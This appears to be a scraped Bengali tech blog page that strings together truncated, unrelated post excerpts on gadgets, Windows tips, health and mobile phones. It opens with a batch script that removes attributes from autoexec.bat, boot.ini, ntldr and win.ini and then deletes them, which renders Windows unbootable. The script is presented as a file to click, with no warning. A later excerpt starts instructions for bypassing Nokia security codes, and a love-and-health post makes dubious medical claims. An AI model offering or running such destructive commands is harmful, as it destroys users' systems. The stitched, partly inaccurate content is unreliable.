attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
.bat file টাতে ক্লিক করলে PC অবশ্যই ReStArT দিতে হবে।।।

হারিয়ে যাচ্ছে ডেস্কটপ কম্পিউটার!!!

আগামী দিনে প্রযুক্তি বিশ্বে কী ধরনের পরিবর্তন আসতে পারে? ভবিষ্যতের কম্পিউটিং এ কী ঘটতে পারে? এমনই জল্পনা-কল্পনা এখন প্রযুক্তি ব্যবহারকারীদের মাঝে। আরও অভাবনীয় পরিবর্তন আসবে এতে কোনো সন্দেহ নেই। তবে ডেস্কটপ কম্পিউটারের ভাগ্যে কী ঘটতে পারে এমনই আশঙ্কা দেখা দিয়েছে। এটা ঠিক যে, ডেস্কটপ কম্পিউটার অনেক বছর যাবত্ মার্কেটে বেশ শক্তভাবে অবস্থান করছিল। কিন্তু যেভাবে প্রযুক্তি বিশ্বে পরিবর্তন ও নতুন নতুন প্রযুক্তি আসছে তাতে ডেস্কটপ কম্পিউটারের ভবিষ্যত্ কী অন্ধকার হয়ে আসছে? তবে কী সামনের দিনে মোবাইল কম্পিউটিং জনপ্রিয় হতে যাচ্ছে? এ কথা বলা সমীচীন, প্রযুক্তিতে ঘটে যেতে পারে আরও চোখ ধাঁধানো চমক।

আপনি কি রবি সিম ব্যবহার করেন তাহলে এই সেবাটা আপনার জন্য প্রয়োয্য।

আজ আাপনাদের জন্য নিয়ে আসলাম রবির নতুন  sociel networking system এর বার্তা নিয়ে। আপনি চাইলে ফ্রি আপনার প্রিয় জনকে SMS করতে পারবেন। বাংলাদেশে শুধুমাত্র রবি এই সুবিধা চালু করেছে। যার নাম করণ করা হয়েছে Robi Circle। আপনারা সবাই জানেন।কিন্তু যারা জানেন না তাদের বলছি।
এটি একদম ফ্রি ।এটি ফেসবুক এর মত ই।
যে ভাবে চালু করবেন।

ওয়েবসাইট এর যেকোনো ছবিকে Icon এ রূপান্তর করুন

একটি আইকন বা favicon তৈরি করতে আমাদেরকে প্রয়োজন অনুযায়ী ছবি খুজে বের করা, তারপর একটি পুরোপুরি বর্গক্ষেত্র তৈরি করা, নির্দিষ্ট ছবিটি প্রয়োজন আনুযায়ী ছোট আকারে resizing করা, ইত্যাদি নানা কাজ করতে হয়। পুরো প্রক্রিয়াটি একটি জটিল প্রক্রিয়া। তাই ওয়েবসাইট থেকে মাত্র কয়েক ক্লিক করে আইকন বা favicon তৈরির পদ্ধতিটি আশা করছি আপনাদের কাজে আসবে।
এই গুরুত্বপূর্ণ হাতিয়ারটির নাম Image2Icon, যা শুধুমাত্র ফায়ারফক্সের জন্য উপলব্ধ।
Image2Icon এর পেজ থেকে ফায়ারফক্সের এই অ্যাড-অনটি আপনার ফায়ারফক্সে যোগ করুন।

আপানার পেন ড্রাইভ, মেমোরীকার্ড ও পিসি এর ড্রাইভের Background এ ছবি সেট করুন !!!

যখন একটি মেমোরীকার্ড, পেনড্রাইভ বা পিসি এর কোন ড্রাইভ ওপেন করা হয় তখন তার Background স্বাভাবিক ভাবে সাদা থাকে ! অর্থাত্‍ ওই ড্রাইভের ফোল্ডারের নিচে কোন ছবি দেখা যায় না ! কিন্তু আমরা চাই নিজের অথবা পচন্দের ছবি Background এ দেখতে চাই তাই এবার আপনি নিজেই আপনার ছবি সেট করে নিন ! বিশ্বাস না হলে এখান থেকে ফাইলটি ডাউনলোড করুন এবং আনজিপ করুন ! আনজিপ করলে Rubelttc ও desktop এই নামের 2 টা ফাইল পাবেন ! ওই দুটা ফাইল কপি করে মেমোরীকার্ড , পেনড্রাইভ বা পিসি এর যেকোন ড্রাইভে পেস্ট করুন ! এবার মাউস দিয়ে রিফ্রেস করুন ! দেখুন আপনার ওই ড্রাইভের Backgroud এ আমার ছবি চলে এসেছে !

ঘাড়, কোমড় ও হাটু ব্যথা রোগীদরে জন্য পরার্মশ ।

বিভিন্ন কারণে যাদের ঘাড়ে, কোমড়ে ও হাটুতে ব্যথা হয়েছে তারা নিম্নের নিয়মগুলো পালন করবেন-

১. মরেুদন্ড ও ঘাড় বাঁকা করে (নীচু হয়ে) কোন কাজ করবনে না।
২. যে কোন একদিকে কাঁত হয়ে হাতে ভর দিয়ে  শোয়া থেকে উঠবনে।
৩. পিড়া, মোড়ায় না বসে পিঠে সাপোর্ট দিয়ে চেয়ারে বসবেন।
৪. হাটু ভাঁজ করে বসা উচিৎ নয়।
৫. ফোমের বিছানায় (নরম বিছানায়) শোয়া নিষেধ।
৬. চেয়ার-টেবিলে বসে ভাত খেতে হবে।
৭. নির্দেশ মত নিয়মিত ব্যায়াম করবেন।
৮. উপদেশ মত ফিজিক্যাল থেরাপী নিবেন।
৯. দাঁড়িয়ে রান্না করবেন, প্রয়োজন হলে চেয়ারে বসে রান্না করবেন।

নকিয়া মোবাইলের সিকিউরিটি কোড ভাঙ্গা এখন কোন ব্যাপারই না ।

পাসওয়ার্ড ভুলে যাওয়া যে কোন মানুষের একটি সহজাত বৈশিষ্ট্য। কিন্তু ব্যাপারটা মোবাইলের ক্ষেত্রে ঘটলে একটু বেশি বিপত্তিই দেখা দেয়। কারণ কম্পিউটার এর থেকে মোবাইলের গুরুত্ব আমাদের কাছে অনেক বেশি। অনেকে সিকিউরিটির কথা ভেবে মোবাইলের সিকিউরিটি কোড পরিবর্তন করে রাখে। কিন্তু সেই কোডটি ভুলে গেলে দেখা দেয় বিপত্তি। আর সেই কোড ভাঙ্গতে আমরা চলে যাই মোবাইল সার্ভিসিং এর দোকানে আর বাধ্য হয়েই তাদের চাহিদামত পেমেন্ট করতে হয়।
আর এই সমস্যা থেকে আপনাকে খানিকটা মুক্তি দেওয়ার জন্য আজ আপনাদেরকে শেখাবো কিভাবে খুব সহজেই আপনি আপনার নকিয়া মোবাইলের সিকিউরিটি কোড ভাঙ্গার জন্য মাস্টার কোড পেতে পারেন। এজন্য নিচের ধাপগুলো অনুসরণ করুন-
১। প্রথমে আপনার মোবাইলের (*#06# চেপে ) IMEI কোডটি কোথাও/নোটপ্যাডে লিখে রাখুন।

কম্পিউটার আবিষ্কারের ইতিকথা অবশ্যই পড়ুন

আধুনিক জীবন যাত্রায় কম্পিউটার একটি অত্যাবশ্যকীয় উপাদান হিসেবে অর্থবহ ভূমিকা রেখে চলেছে। প্রাচীন গণনা যন্ত্র ‘অ্যাবাকাস’ কম্পিউটারের ইতিহাসে সূচনা হলেও প্রকৃতপক্ষে কম্পিউটারের কার্যক্রম অত্যন্ত ব্যাপক। আর এর আবিষ্কারক হিসেবে কেউ এককভাবে দাবীদার নয়। বরং কম্পিউটারের ইতিহাসে আমরা পর্যায়ক্রমিক বিবর্তন লক্ষ্য করেছি। একটি বিষয় বলে রাখা ভাল, কেবলমাত্র যন্ত্রই কম্পিউটার নয়, আবার সফটওয়্যার যন্ত্র ছাড়া তা কার্যকর হতে পারে না। আজকের দিনে কম্পিউটারের অবস্থান উচ্চক্ষমতা সম্পন্ন যন্ত্রসমূহ এবং সেই সঙ্গে সফটওয়্যারের যথার্থ সমন্বয়ে অর্থবহ হয়ে ওঠেছে।
১৬৭১ সালে গটফ্রাইড ভন লিবনিজ নামক একজন জার্মান গণিতবিদ প্যাস্কালের যান্ত্রিক গণনাযন্ত্রের ভিত্তিতে আরও আধুনিক গণনাযন্ত্র তৈরি করেন। এর সাহায্যে যোগ, বিয়োগ, গুণ, ভাগ এবং উৎপাদক নির্ণয় করা যেতো। তিনিই প্রথম পুনঃপুন যোগের মাধ্যমে গুণ করার পদ্ধতি উদ্ভাবন করেন। ১৭৮৬ সালে জোহান হেলফ্লিক মুলার একটি গণনা যন্ত্রের ধারণা দেন। ১৮০১ সালে ফ্রান্সের জোসেফ মেরী জেকার্ড পাঞ্চকার্ড ব্যবহার শুরু করেন।

ভালবাসা স্বাস্থ্যের জন্য বেশ উপকারী।

প্রেম ভালবাসাকে একটু বাঁকা চোখে অনেকেই দেখেন। কিন্তু ভালবাসা মানুষের স্বাস্থের জন্য বেশ উপকারী।
১. প্রেমে পড়লে মানুষের মন এবং শরীর শান্ত হয়। আর এটা হয় এক ধরনের হরমোন নিসৃত হওয়ার কারণে। এই হরমোন মানুষের নার্ভাস সিস্টেমকে পুনর্গঠন করতে সাহায্য করে। এতে নতুন ব্রেইন সেল তৈরি হয়। ফলে স্মৃতিশক্তি বৃদ্ধি পায়।
২. ভালো না বাসলে মানুষের মনে অধিকাংশ সময়ই ক্রোধ থাকে। যা শরীরের জন্য অত্যন্ত ক্ষতিকর। কিন্তু ভালবাসলে শরীর সেই ক্ষতি থেকে বেঁচে যায়। কারণ ভালবাসা মানুষের মনে রোমাঞ্চকর অনুভূতির সৃষ্টি করে। ফলে ইমিউন, এন্ডোক্রাইন এবং কার্ডিওভাস্কুলার সিস্টেম উপকৃত হয়।
৩. কেউ যদি তার কাঙ্খিত মানুষটির সঙ্গে কথা বলে তাহলে তার হার্টবিট তিনগুণ বেড়ে যায়। যার ফলে সারা শরীরে স্বাভাবিকের চেয়ে বেশি মাত্রায় রক্ত চলাচল করে। যা স্বাস্থ্যের পক্ষে ভালো।
৪. নর্থ ক্যারোলাইনা বিশ্ববিদ্যালয়ের এক গবেষণায় দেখা যায়, যে প্রেমিক প্রেমিকারা খুব কাছাকাছি সময় কাটায় এবং পাশাপাশি বসে ভালবাসার কথা বলে তাদের শরীর থেকে অক্সিটোসিন নামক এক প্রকার লাভ হরমোন উচ্চমাত্রায় নিঃসৃত হয়। এর ফলে মেয়েদের ব্লাড প্রেসার কমে যায়।

প্রযুক্তিকে ব্যবহার করে এবার আপনিও ধরে ফেলতে পারেন চোরকে।

আজ আমি আপনাদের জন্য নিয়ে আসলাম প্রযুক্তিকে ব্যবহার করে আপনিও সহজে কিভাবে সহজে চোর ধরে ফেলতে পারেন তার একটি সফটওয়্যার। আমি যে সফটওয়্যার এর কথা বলব এইটা একটা চোর ধরার সফটওয়্যার। অর্থাৎ আপনার কম্পিউটার বা ল্যাপটপ কোন চোর বা ছিনতাইকারী নিয়ে গেলে ঐ কম্পিউটার বা ল্যাপটপে সফটওয়্যারটা ইন্সটল করা থাকলে ছুরি হওয়া কম্পিউটার বা ল্যাপটপ খুব সহজেই আপনি নিয়ন্ত্রন করতে পাররেন, যেমন -  লক করতে পাররেন, অ্যালার্ম দিতে পাররেন, চোরের লোকেশান দেখতে পারবেন। এমন কি আপনার হারিয়ে জাওয়া ল্যাপটপে যদি ওয়েব ক্যাম থাকে তাহলে তো আর কোন কথায় নাই , কারন ২০ মিনিট পর পর কম্পিউটার স্কিনশট এবং ঐ চোর বেটার ছবি সহ পোঁছে যাবে আপনার মেইলে। এবং আরো অনেক কিছু......
আপনারা যারা ল্যাপটপ নিয়ে সবসময় বাইরে থাকেন আমার মনে হয় এই সফটওয়্যারটা আপনাদের জন্য বেশি কাজে লাগবে ।
 একজন চোর গাড়ী থেকে ল্যাপটপ চুরি করে নিয়ে যাচ্ছে ।

পেন ড্রাইভ দিয়ে সবচেয়ে সহজে উইন্ডোজ ইন্সটল করুন

আজ আপনাদের জন্য নিয়ে আসলাম কিভাবে আপনি পেনড্রাইব দিয়ে উইন্ডোজ ইন্সটল করবেন সেই সহজ পদ্ধতি। আমিও আজ উইন্ডোজ ইন্সটল নিয়ে এই পোস্টটি করছি । আমরা অনেকে নেট বুক ব্যবহার করি । কিন্তু নেট বুকে ডিবিডি রুম না থাকায় নতুন করে উইন্ডোজ ইন্সটল করার সময় আমাদের পরতে হয় বিপাকে । আর যাতে এমন বিপাকে পরতে  না হয় সে জন্যই পেন ড্রাইভে কি করে উইন্ডোজ ইন্সটল করা যায় তাই আপনাদের দেখাব । এই প্রক্রিয়ায় উইন্ডোজ ইন্সটল করতে আপনার যা লাগবে তা হল

আপনার জিমেইল একাউন্টকে করুন হ্যাক প্রুফ ।

অনেক সময় অসতর্কতার কারনে ইমেইলের পাসওয়ার্ড চুরি (হ্যাক) হয়ে যায়।জিমেইল ব্যবহারকারীরা মোবাইল ভেরিফিকেশন চালু  ইচ্ছে করে ইমেইলের নিরাপত্তা ব্যবস্থা মজবুত করতে পারেন ।এটি চালু করলে প্রতিবার আপনার ইমেইল লগইন করার সময় আপনার মোবাইলে একটি কোড পাঠানো হবে।উক্ত কোড ছাড়া ইমেইল চালু করা যাবে না,যার ফলে হ্যাকারদের পক্ষে আপনার ইমেইল আয়ত্তে নেয়া সম্ভব হবে না। মোবাইল ভেরিফিকেশন চালু করার জন্য  প্রথমে আপনার জিমেইল আইডি লগইন করুন।
এরপর সবার উপরে ডানে settings অপশনে যান ,সেখান থেকে account  ট্যাবের অর্ন্তগত Google account settings অপশনে ক্লীক

লক করে রাখুন আপনার মাউস ও কীবোর্ড।

আজ আপনাদের জন্য নিয়ে আসলাম নতুন আরেকটা প্রয়োজনীয় বিষয়। তাহল আমরা যখন কম্পিউটার অন করে রেখে এর পাশে বা বাসায় থাকি না তখন আমাদের কম্পিউটার এর মাউস ও কীবোর্ড বাসার ছোটরা কারণে অকারণে তা নিয়ে চাপা-চাপি করে। তখন আমাদের জমানো অনেক প্রয়োজনীয় তথ্য ও সফটওয়্যার ডিলিট হয়ে যেতে  পারে। তাই আমাদের প্রয়োজনীয় তথ্য ও সফটওয়্যার যাতে হারিয়ে না ফেলি আমাদের সর্তকতার প্রয়োজন। আমি আজ আপনাদের জন্য

জনপ্রিয় পোস্টসমূহ

ক্রিকেট ঝলক

ফেসবুক ব্যাজ

Top